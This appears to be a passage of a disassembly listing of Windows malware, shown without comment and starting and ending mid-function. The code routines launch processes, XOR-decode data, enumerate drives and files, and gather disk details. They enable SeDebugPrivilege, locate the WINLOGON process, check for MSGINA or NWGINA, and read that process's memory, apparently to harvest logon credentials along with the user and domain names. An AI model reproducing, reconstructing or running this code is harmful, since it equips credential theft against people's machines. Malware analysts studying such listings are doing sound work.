loc_416B34: ; CODE XREF: sub_4167A0+2A6�j
mov dword ptr [ebp+var_8], ebx
mov dword ptr [ebp+var_8+4], esi
fild [ebp+var_8]
push ecx
push ecx
mov dword ptr [ebp+var_8], edi
mov dword ptr [ebp+var_8+4], esi
fmul ds:dbl_427690
lea eax, [ebp+Filename]
fstp [esp+584h+var_584]
fild [ebp+var_8]
push eax
push ecx
push ecx
lea eax, [ebp+Dst]
fmul ds:dbl_427690
fstp [esp+590h+var_590]
push offset asc_43821C ; "-"
push eax ; Dest
call _sprintf
add esp, 1Ch
cmp [ebp+var_30], esi
jnz short loc_416B9C
push esi ; int
lea eax, [ebp+Dst]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_2CC] ; int
call sub_409869
add esp, 14h
loc_416B9C: ; CODE XREF: sub_4167A0+3DA�j
lea eax, [ebp+Dst]
push eax
call sub_415D38
push 10h ; Size
lea eax, [ebp+var_10]
push esi ; Val
push eax ; Dst
call _memset
push 44h
lea eax, [ebp+var_310]
pop edi
push edi ; Size
push esi ; Val
push eax ; Dst
call _memset
add esp, 1Ch
mov [ebp+var_310], edi
lea eax, [ebp+var_10]
mov [ebp+var_304], offset byte_43DB88
push 1
mov [ebp+var_2E0], si
pop edi
push eax
lea eax, [ebp+var_310]
push eax
push esi
push esi
push 28h
push esi
push esi
lea eax, [ebp+Filename]
push esi
push eax
push esi
mov [ebp+var_2E4], edi
call ds:dword_427074 ; CreateProcessA
cmp eax, edi
jnz short loc_416C1E
call dword_4CB92C ; WSACleanup
call sub_4188A6
push esi
call ds:dword_42706C ; ExitProcess
loc_416C1E: ; CODE XREF: sub_4167A0+46A�j
lea eax, [ebp+Filename]
push eax
push offset unk_4381E8
jmp short loc_416C38
; ---------------------------------------------------------------------------
loc_416C2C: ; CODE XREF: sub_4167A0+45�j
lea eax, [ebp+var_248]
push eax
push offset asc_4381BC ; "-"
loc_416C38: ; CODE XREF: sub_4167A0+48A�j
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_30], esi
jnz short loc_416C6C
push esi ; int
lea eax, [ebp+Dst]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_2CC] ; int
call sub_409869
add esp, 14h
loc_416C6C: ; CODE XREF: sub_4167A0+4AA�j
lea eax, [ebp+Dst]
push eax
call sub_415D38
pop ecx
loc_416C79: ; CODE XREF: sub_4167A0+29C�j
; sub_4167A0+325�j ...
push [ebp+var_18]
call dword_4CBA08 ; InternetCloseHandle
push [ebp+var_48]
call sub_40B6D6
pop ecx
push esi
call ds:dword_4270D4 ; ExitThread
sub_4167A0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_416C92 proc near ; CODE XREF: sub_4167A0+11E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
xor ecx, ecx
cmp [esp+arg_4], ecx
jle short locret_416CAE
loc_416C9E: ; CODE XREF: sub_416C92+1A�j
mov dl, byte_429094
xor [ecx+eax], dl
inc ecx
cmp ecx, [esp+arg_4]
jl short loc_416C9E
locret_416CAE: ; CODE XREF: sub_416C92+A�j
retn
sub_416C92 endp
; =============== S U B R O U T I N E =======================================
sub_416CAF proc near ; CODE XREF: sub_401ACD+5761�p
; sub_401ACD+5896�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_41DC5E
pop ecx
pop ecx
xor ecx, ecx
cmp eax, 0FFFFFFFFh
setnz cl
mov eax, ecx
retn
sub_416CAF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416CC9 proc near ; CODE XREF: sub_41036B+458�p
; sub_41036B+5FD�p ...
var_38 = byte ptr -38h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
and [ebp+var_4], 0
push ebx
push esi
push edi
push 32h ; Size
mov edi, offset dword_4D35F8
push 0 ; Val
push edi ; Dst
call _memset
mov ebx, [ebp+arg_0]
add esp, 0Ch
lea esi, [ebp+var_38]
loc_416CEE: ; CODE XREF: sub_416CC9+5B�j
; sub_416CC9+61�j
push 0
push 0Ah
push [ebp+arg_4]
push ebx
call __aullrem
push 0
push 0Ah
push [ebp+arg_4]
add al, 30h
mov [esi], al
inc esi
push ebx
call __aulldiv
mov ebx, eax
or eax, edx
mov [ebp+arg_4], edx
jz short loc_416D2C
inc [ebp+var_4]
push 3
mov eax, [ebp+var_4]
pop ecx
cdq
idiv ecx
test edx, edx
jnz short loc_416CEE
mov byte ptr [esi], 2Ch
inc esi
jmp short loc_416CEE
; ---------------------------------------------------------------------------
loc_416D2C: ; CODE XREF: sub_416CC9+4B�j
dec esi
mov eax, edi
loc_416D2F: ; CODE XREF: sub_416CC9+73�j
lea ecx, [ebp+var_38]
cmp esi, ecx
jb short loc_416D3E
mov cl, [esi]
mov [eax], cl
inc eax
dec esi
jmp short loc_416D2F
; ---------------------------------------------------------------------------
loc_416D3E: ; CODE XREF: sub_416CC9+6B�j
and byte ptr [eax], 0
mov eax, edi
pop edi
pop esi
pop ebx
leave
retn
sub_416CC9 endp
; =============== S U B R O U T I N E =======================================
sub_416D48 proc near ; CODE XREF: sub_416EFD+51�p
; sub_416EFD+87�p
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_4CBA34 ; GetDriveTypeA
sub eax, 0
jz short loc_416D8B
dec eax
jz short loc_416D85
dec eax
dec eax
jz short loc_416D7F
dec eax
jz short loc_416D79
dec eax
jz short loc_416D73
dec eax
jz short loc_416D6D
mov eax, offset word_4383AC
retn
; ---------------------------------------------------------------------------
loc_416D6D: ; CODE XREF: sub_416D48+1D�j
mov eax, offset off_4383A8
retn
; ---------------------------------------------------------------------------
loc_416D73: ; CODE XREF: sub_416D48+1A�j
mov eax, offset aCdrom ; "Cdrom"
retn
; ---------------------------------------------------------------------------
loc_416D79: ; CODE XREF: sub_416D48+17�j
mov eax, offset aNetwork ; "Network"
retn
; ---------------------------------------------------------------------------
loc_416D7F: ; CODE XREF: sub_416D48+14�j
mov eax, offset aDisk ; "Disk"
retn
; ---------------------------------------------------------------------------
loc_416D85: ; CODE XREF: sub_416D48+10�j
mov eax, offset aInvalid ; "Invalid"
retn
; ---------------------------------------------------------------------------
loc_416D8B: ; CODE XREF: sub_416D48+D�j
mov eax, offset aUnknown ; "Unknown"
retn
sub_416D48 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416D91 proc near ; CODE XREF: sub_416DD9+12�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
or eax, 0FFFFFFFFh
mov [ebp+var_18], eax
mov [ebp+var_14], eax
mov [ebp+var_10], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
mov [ebp+var_4], eax
mov eax, dword_4CB8C4
test eax, eax
jz short loc_416DC6
lea ecx, [ebp+var_10]
push ecx
lea ecx, [ebp+var_8]
push ecx
lea ecx, [ebp+var_18]
push ecx
push [ebp+arg_4]
call eax ; GetDiskFreeSpaceExA
loc_416DC6: ; CODE XREF: sub_416D91+22�j
mov eax, [ebp+arg_0]
push esi
push edi
push 6
pop ecx
lea esi, [ebp+var_18]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_416D91 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416DD9 proc near ; CODE XREF: sub_416EFD+17�p
; sub_41AF8F+1F3�p
Dest = byte ptr -198h
var_118 = byte ptr -118h
var_98 = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 198h
push esi
push edi
push [ebp+arg_4]
lea eax, [ebp+var_18]
push eax
call sub_416D91
pop ecx
mov esi, eax
pop ecx
lea edi, [ebp+var_18]
push 6
pop ecx
rep movsd
mov eax, [ebp+var_18]
and eax, [ebp+var_14]
cmp eax, 0FFFFFFFFh
jz loc_416EB7
mov eax, [ebp+var_10]
and eax, [ebp+var_C]
cmp eax, 0FFFFFFFFh
jz loc_416EB7
mov eax, [ebp+var_8]
and eax, [ebp+var_4]
cmp eax, 0FFFFFFFFh
jz loc_416EB7
push ebx
mov ebx, 400h
push 0
push ebx
push [ebp+var_14]
push [ebp+var_18]
call __alldiv
push edx
push eax
call sub_416CC9
pop ecx
mov edi, offset aSkb ; "%sKB"
pop ecx
mov esi, 80h
push eax
push edi ; Format
lea eax, [ebp+Dest]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
push 0
push ebx
push [ebp+var_C]
push [ebp+var_10]
call __alldiv
push edx
push eax
call sub_416CC9
pop ecx
pop ecx
push eax
push edi ; Format
lea eax, [ebp+var_118]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
push 0
push ebx
push [ebp+var_4]
push [ebp+var_8]
call __alldiv
push edx
push eax
call sub_416CC9
pop ecx
pop ecx
push eax
push edi ; Format
lea eax, [ebp+var_98]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
pop ebx
jmp short loc_416EE9
; ---------------------------------------------------------------------------
loc_416EB7: ; CODE XREF: sub_416DD9+2C�j
; sub_416DD9+3B�j ...
mov esi, offset aFailed ; "failed"
lea eax, [ebp+Dest]
push esi ; Format
push eax ; Dest
call _sprintf
pop ecx
lea eax, [ebp+var_118]
pop ecx
push esi ; Format
push eax ; Dest
call _sprintf
pop ecx
lea eax, [ebp+var_98]
pop ecx
push esi ; Format
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_416EE9: ; CODE XREF: sub_416DD9+DC�j
mov eax, [ebp+arg_0]
push 60h
pop ecx
lea esi, [ebp+Dest]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_416DD9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_416EFD(int,char *Str,int,int)
sub_416EFD proc near ; CODE XREF: sub_416FCF+17�p
; sub_416FCF+60�p
Dest = byte ptr -500h
var_300 = byte ptr -300h
var_180 = byte ptr -180h
var_100 = byte ptr -100h
Str1 = byte ptr -80h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 500h
push ebx
mov ebx, [ebp+arg_C]
push esi
push edi
lea eax, [ebp+var_300]
push ebx
push eax
call sub_416DD9
push 60h
mov esi, eax
pop ecx
lea edi, [ebp+var_300]
rep movsd
push 60h
lea esi, [ebp+var_300]
pop ecx
lea edi, [ebp+var_180]
lea eax, [ebp+Str1]
push offset aFailed ; "failed"
rep movsd
push eax ; Str1
call _strcmp
add esp, 10h
test eax, eax
jnz short loc_416F70
push ebx
push ebx
call sub_416D48
pop ecx
push eax
push offset asc_4383FC ; "-"
lea eax, [ebp+Dest]
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 14h
jmp short loc_416FA4
; ---------------------------------------------------------------------------
loc_416F70: ; CODE XREF: sub_416EFD+4D�j
lea eax, [ebp+var_180]
push eax
lea eax, [ebp+var_100]
push eax
lea eax, [ebp+Str1]
push eax
push ebx
push ebx
call sub_416D48
pop ecx
push eax
push offset asc_4383C0 ; "-"
lea eax, [ebp+Dest]
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 20h
loc_416FA4: ; CODE XREF: sub_416EFD+71�j
push 1 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409869
lea eax, [ebp+Dest]
push eax
call sub_415D38
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_416EFD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_416FCF(int,char *Str,int,int)
sub_416FCF proc near ; CODE XREF: sub_401ACD+252E�p
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
xor ebx, ebx
cmp [ebp+arg_C], ebx
jz short loc_416FF0
push [ebp+arg_C] ; int
push [ebp+arg_8] ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_416EFD
add esp, 10h
jmp short loc_417051
; ---------------------------------------------------------------------------
loc_416FF0: ; CODE XREF: sub_416FCF+9�j
push esi
push edi
push ebx
push ebx
call dword_4CB93C ; GetLogicalDriveStringsA
lea esi, [eax+2]
push esi ; Size
call _malloc
pop ecx
mov edi, eax
push edi
push esi
call dword_4CB93C ; GetLogicalDriveStringsA
cmp [edi], bl
mov esi, edi
jz short loc_417048
loc_417014: ; CODE XREF: sub_416FCF+77�j
push offset aA_1 ; "A:\\"
push esi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_417037
push esi ; int
push [ebp+arg_8] ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_416EFD
add esp, 10h
loc_417037: ; CODE XREF: sub_416FCF+54�j
push esi ; Str
call _strlen
cmp [esi+eax+1], bl
lea esi, [esi+eax+1]
pop ecx
jnz short loc_417014
loc_417048: ; CODE XREF: sub_416FCF+43�j
push edi
call sub_41BA91
pop ecx
pop edi
pop esi
loc_417051: ; CODE XREF: sub_416FCF+1F�j
pop ebx
pop ebp
retn
sub_416FCF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417054 proc near ; DATA XREF: sub_401ACD+67C1�o
Dest = byte ptr -49Ch
var_29C = dword ptr -29Ch
var_298 = byte ptr -298h
var_218 = dword ptr -218h
var_115 = byte ptr -115h
Str = byte ptr -114h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 49Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov ecx, 0A7h
mov esi, eax
lea edi, [ebp+var_29C]
rep movsd
mov dword ptr [eax+298h], 1
lea eax, [ebp+Str]
push eax ; Str
call _strlen
xor ebx, ebx
cmp [ebp+eax+var_115], 5Ch
pop ecx
jnz short loc_4170A9
lea eax, [ebp+Str]
push eax ; Str
call _strlen
pop ecx
mov [ebp+eax+var_115], bl
loc_4170A9: ; CODE XREF: sub_417054+3F�j
lea eax, [ebp+var_218]
push eax
push offset asc_43845C ; "-"
lea eax, [ebp+Dest]
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 10h
cmp [ebp+var_8], ebx
jnz short loc_4170EE
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+var_298]
push eax ; Str
push [ebp+var_29C] ; int
call sub_409869
add esp, 14h
loc_4170EE: ; CODE XREF: sub_417054+78�j
lea eax, [ebp+Str]
push ebx ; int
push eax ; int
lea eax, [ebp+var_218]
push eax ; int
lea eax, [ebp+var_298]
push [ebp+var_C] ; int
push eax ; Str
push [ebp+var_29C] ; int
call sub_41716F
add esp, 18h
push eax
lea eax, [ebp+Dest]
push offset asc_43843C ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_41714F
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+var_298]
push eax ; Str
push [ebp+var_29C] ; int
call sub_409869
add esp, 14h
loc_41714F: ; CODE XREF: sub_417054+D9�j
lea eax, [ebp+Dest]
push eax
call sub_415D38
push [ebp+var_10]
call sub_40B6D6
pop ecx
pop ecx
push ebx
call ds:dword_4270D4 ; ExitThread
pop edi
pop esi
pop ebx
sub_417054 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41716F(int,char *Str,int,int,int,int)
sub_41716F proc near ; CODE XREF: sub_417054+B9�p
; sub_41716F+9E�p
var_54C = dword ptr -54Ch
var_34C = dword ptr -34Ch
Dest = byte ptr -248h
var_144 = byte ptr -144h
var_118 = byte ptr -118h
var_117 = byte ptr -117h
var_4 = dword ptr -4
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 54Ch
push ebx
push esi
push edi
mov esi, 104h
push [ebp+arg_10]
lea eax, [ebp+Dest]
push offset aS_3 ; "%s\\*"
push esi ; Count
push eax ; Dest
call __snprintf
mov edi, ds:dword_427124
add esp, 10h
lea eax, [ebp+var_144]
push eax
lea eax, [ebp+Dest]
push eax
call edi ; FindFirstFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
mov ebx, offset Format ; "%s\\%s"
jz short loc_41722C
loc_4171BB: ; CODE XREF: sub_41716F+BB�j
test [ebp+var_144], 10h
jz short loc_417218
cmp [ebp+var_118], 2Eh
jnz short loc_4171DF
cmp [ebp+var_117], 0
jz short loc_417218
cmp [ebp+var_117], 2Eh
jz short loc_417218
loc_4171DF: ; CODE XREF: sub_41716F+5C�j
lea eax, [ebp+var_118]
push eax
lea eax, [ebp+var_34C]
push [ebp+arg_10]
push ebx ; Format
push esi ; Count
push eax ; Dest
call __snprintf
push [ebp+arg_14] ; int
lea eax, [ebp+var_34C]
push eax ; int
push [ebp+arg_C] ; int
push [ebp+arg_8] ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_41716F
add esp, 2Ch
mov [ebp+arg_14], eax
loc_417218: ; CODE XREF: sub_41716F+53�j
; sub_41716F+65�j ...
lea eax, [ebp+var_144]
push eax
push [ebp+var_4]
call ds:dword_427120 ; FindNextFileA
test eax, eax
jnz short loc_4171BB
loc_41722C: ; CODE XREF: sub_41716F+4A�j
push [ebp+var_4]
call ds:dword_427000 ; FindClose
push [ebp+arg_C]
lea eax, [ebp+Dest]
push [ebp+arg_10]
push ebx ; Format
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 14h
lea eax, [ebp+var_144]
push eax
lea eax, [ebp+Dest]
push eax
call edi ; FindFirstFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_4172B2
loc_417263: ; CODE XREF: sub_41716F+141�j
lea eax, [ebp+var_118]
inc [ebp+arg_14]
push eax
lea eax, [ebp+var_54C]
push [ebp+arg_10]
push offset asc_438484 ; "-"
push 200h ; Count
push eax ; Dest
call __snprintf
push 1 ; int
lea eax, [ebp+var_54C]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409869
add esp, 28h
lea eax, [ebp+var_144]
push eax
push esi
call ds:dword_427120 ; FindNextFileA
test eax, eax
jnz short loc_417263
loc_4172B2: ; CODE XREF: sub_41716F+F2�j
push esi
call ds:dword_427000 ; FindClose
mov eax, [ebp+arg_14]
pop edi
pop esi
pop ebx
leave
retn
sub_41716F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4172C1 proc near ; DATA XREF: sub_401ACD+1C72�o
Dest = byte ptr -29Ch
var_9C = dword ptr -9Ch
Str = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 29Ch
mov eax, [ebp+arg_0]
push esi
push edi
push 25h
pop ecx
mov esi, eax
lea edi, [ebp+var_9C]
push 1
rep movsd
pop esi
mov [eax+90h], esi
call sub_41AE41
cmp eax, esi
mov [ebp+var_4], eax
jz short loc_417300
cmp eax, 2
jz short loc_417300
push offset unk_438678
jmp loc_41743F
; ---------------------------------------------------------------------------
loc_417300: ; CODE XREF: sub_4172C1+2E�j
; sub_4172C1+33�j
push esi
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_419B9E
pop ecx
test eax, eax
pop ecx
jz loc_41743A
push ebx
push offset aNtdll_dll ; "NTDLL.DLL"
call ds:dword_4270C0 ; LoadLibraryA
mov esi, ds:dword_4270C4
mov edi, eax
push offset aNtquerysystemi ; "NtQuerySystemInformation"
push edi
mov [ebp+var_8], edi
call esi ; GetProcAddress
push offset aRtlcreatequery ; "RtlCreateQueryDebugBuffer"
push edi
mov dword_4D483C, eax
call esi ; GetProcAddress
push offset aRtlqueryproces ; "RtlQueryProcessDebugInformation"
push edi
mov dword_4D4830, eax
call esi ; GetProcAddress
push offset aRtldestroyquer ; "RtlDestroyQueryDebugBuffer"
push edi
mov dword_4D4A40, eax
call esi ; GetProcAddress
push offset aRtlrundecodeun ; "RtlRunDecodeUnicodeString"
push edi
mov dword_4D4838, eax
call esi ; GetProcAddress
mov dword_4D4834, eax
call sub_417493
test eax, eax
mov [ebp+arg_0], eax
jz loc_41740D
mov esi, ds:dword_427148
mov edi, 400h
mov ebx, offset word_4D3830
push edi
push ebx
push offset aUsername ; "USERNAME"
call esi ; GetEnvironmentVariableW
push edi
mov edi, offset word_4D4030
push edi
push offset aUserdomain ; "USERDOMAIN"
call esi ; GetEnvironmentVariableW
cmp [ebp+var_4], 1
push offset dword_4D4A48
push [ebp+arg_0]
jnz short loc_4173B9
call sub_41761C
jmp short loc_4173BE
; ---------------------------------------------------------------------------
loc_4173B9: ; CODE XREF: sub_4172C1+EF�j
call sub_4177C3
loc_4173BE: ; CODE XREF: sub_4172C1+F6�j
pop ecx
test eax, eax
pop ecx
jz short loc_417406
cmp dword_4D4A48, 0
jnz short loc_4173ED
push ebx
push edi
push [ebp+arg_0]
lea eax, [ebp+Dest]
push offset asc_438540 ; "-"
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 18h
jmp short loc_417420
; ---------------------------------------------------------------------------
loc_4173ED: ; CODE XREF: sub_4172C1+10A�j
cmp [ebp+var_4], 1
push [ebp+arg_0]
jnz short loc_4173FD
call sub_4178F9
jmp short loc_417402
; ---------------------------------------------------------------------------
loc_4173FD: ; CODE XREF: sub_4172C1+133�j
call sub_417990
loc_417402: ; CODE XREF: sub_4172C1+13A�j
pop ecx
push eax
jmp short loc_417412
; ---------------------------------------------------------------------------
loc_417406: ; CODE XREF: sub_4172C1+101�j
push offset unk_438508
jmp short loc_417412
; ---------------------------------------------------------------------------
loc_41740D: ; CODE XREF: sub_4172C1+B6�j
push offset asc_4384DC ; "-"
loc_417412: ; CODE XREF: sub_4172C1+143�j
; sub_4172C1+14A�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_417420: ; CODE XREF: sub_4172C1+12A�j
push 0
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_419B9E
pop ecx
pop ecx
push [ebp+var_8]
call ds:dword_427144 ; FreeLibrary
pop ebx
jmp short loc_41744D
; ---------------------------------------------------------------------------
loc_41743A: ; CODE XREF: sub_4172C1+4E�j
push offset asc_4384A8 ; "-"
loc_41743F: ; CODE XREF: sub_4172C1+3A�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_41744D: ; CODE XREF: sub_4172C1+177�j
xor esi, esi
cmp [ebp+var_10], esi
jnz short loc_417474
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_14] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_9C] ; int
call sub_409869
add esp, 14h
loc_417474: ; CODE XREF: sub_4172C1+191�j
lea eax, [ebp+Dest]
push eax
call sub_415D38
push [ebp+var_18]
call sub_40B6D6
pop ecx
pop ecx
push esi
call ds:dword_4270D4 ; ExitThread
pop edi
pop esi
sub_4172C1 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_417493 proc near ; CODE XREF: sub_4172C1+AC�p
String = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
sub esp, 18h
and [esp+18h+var_4], 0
and [esp+18h+var_14], 0
push ebx
push ebp
push esi
mov esi, ds:dword_427154
mov ebx, 100h
push edi
push ebx
push 8
call esi ; GetProcessHeap
mov edi, ds:dword_427150
push eax
call edi ; RtlAllocateHeap
mov ebp, eax
lea eax, [esp+28h+var_14]
push eax
push ebx
push ebp
push 10h
call dword_4D483C
push ebp
push 0
call esi ; GetProcessHeap
push eax
call ds:dword_42714C ; RtlFreeHeap
push [esp+28h+var_14]
push 8
call esi ; GetProcessHeap
push eax
call edi ; RtlAllocateHeap
mov ebp, eax
mov eax, [esp+28h+var_14]
lea ecx, [esp+28h+var_C]
mov [esp+28h+var_C], eax
push ecx
push eax
push ebp
push 10h
call dword_4D483C
test eax, eax
jnz short loc_417580
mov eax, [esp+28h+var_C]
shr eax, 4
mov [esp+28h+var_10], eax
jz short loc_417580
push 1
mov ebx, ebp
pop ecx
cmp eax, ecx
mov [esp+28h+String], ecx
jb short loc_417580
loc_41751C: ; CODE XREF: sub_417493+EB�j
cmp word ptr [ebx+8], 5
jnz short loc_417573
push 0
push 0
call dword_4D4830
mov edi, eax
push edi
push 1
push dword ptr [ebx+4]
call dword_4D4A40
test eax, eax
jnz short loc_417564
mov eax, [edi+60h]
push offset aWinlogon ; "WINLOGON"
mov [esp+2Ch+var_8], eax
lea eax, [edi+80h]
push eax ; String
call __strupr
pop ecx
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_417598
loc_417564: ; CODE XREF: sub_417493+AA�j
test edi, edi
jz short loc_41756F
push edi
call dword_4D4838
loc_41756F: ; CODE XREF: sub_417493+D3�j
mov eax, [esp+28h+var_10]
loc_417573: ; CODE XREF: sub_417493+8E�j
add ebx, 10h
inc [esp+28h+String]
cmp [esp+28h+String], eax
jbe short loc_41751C
loc_417580: ; CODE XREF: sub_417493+6D�j
; sub_417493+7A�j ...
xor edi, edi
loc_417582: ; CODE XREF: sub_417493+17D�j
push ebp
push 0
call esi ; GetProcessHeap
push eax
call ds:dword_42714C ; RtlFreeHeap
mov eax, edi
loc_417590: ; CODE XREF: sub_417493+184�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 18h
retn
; ---------------------------------------------------------------------------
loc_417598: ; CODE XREF: sub_417493+CF�j
and [esp+28h+var_10], 0
cmp [esp+28h+var_8], 0
jbe short loc_417601
lea eax, [edi+80h]
mov [esp+28h+String], eax
loc_4175AE: ; CODE XREF: sub_417493+16C�j
add [esp+28h+String], 11Ch
push offset aNwgina ; "NWGINA"
push [esp+2Ch+String] ; String
call __strupr
pop ecx
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_417615
push offset aMsgina ; "MSGINA"
push [esp+2Ch+String] ; String
call __strupr
pop ecx
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_4175F3
mov eax, [ebx+4]
mov [esp+28h+var_4], eax
loc_4175F3: ; CODE XREF: sub_417493+157�j
inc [esp+28h+var_10]
mov eax, [esp+28h+var_10]
cmp eax, [esp+28h+var_8]
jb short loc_4175AE
loc_417601: ; CODE XREF: sub_417493+10F�j
test edi, edi
jz short loc_41760C
push edi
call dword_4D4838
loc_41760C: ; CODE XREF: sub_417493+170�j
mov edi, [esp+28h+var_4]
jmp loc_417582
; ---------------------------------------------------------------------------
loc_417615: ; CODE XREF: sub_417493+13C�j
xor eax, eax
jmp loc_417590
sub_417493 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41761C proc near ; CODE XREF: sub_4172C1+F1�p
var_64 = byte ptr -64h
var_60 = dword ptr -60h
var_40 = byte ptr -40h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2B = byte ptr -2Bh
var_24 = byte ptr -24h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 64h
push esi
xor esi, esi
push [ebp+arg_0]
mov [ebp+var_10], esi
push esi
push 410h
call ds:dword_42708C ; OpenProcess
cmp eax, esi
mov [ebp+var_4], eax
jnz short loc_417645
xor eax, eax
jmp loc_4177C0
; ---------------------------------------------------------------------------
loc_417645: ; CODE XREF: sub_41761C+20�j
mov eax, [ebp+arg_4]
push ebx
push edi
mov [eax], esi
lea eax, [ebp+var_64]
push eax
call ds:dword_427160 ; GetSystemInfo
push [ebp+var_60]
mov [ebp+var_8], esi
mov esi, ds:dword_427154
push 8
call esi ; GetProcessHeap
mov edi, ds:dword_427150
push eax
call edi ; RtlAllocateHeap
lea ecx, [ebp+var_8]
mov ebx, ds:dword_42715C
push ecx
mov [ebp+arg_0], eax
push [ebp+var_60]
push eax
push 7FFDF000h
push [ebp+var_4]
call ebx ; ReadProcessMemory
test eax, eax
jnz short loc_417695
xor esi, esi
jmp loc_4177B3
; ---------------------------------------------------------------------------
loc_417695: ; CODE XREF: sub_41761C+70�j
lea eax, [ebp+var_40]
push 1Ch
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+18h]
push [ebp+var_4]
call ds:dword_427158 ; VirtualQueryEx
test eax, eax
jz loc_4177A2
mov ecx, [ebp+var_30]
mov eax, 1000h
and ecx, eax
cmp ecx, eax
jnz loc_4177A2
test [ebp+var_2B], 1
jnz loc_4177A2
push [ebp+var_34]
push 8
call esi ; GetProcessHeap
push eax
call edi ; RtlAllocateHeap
mov edi, eax
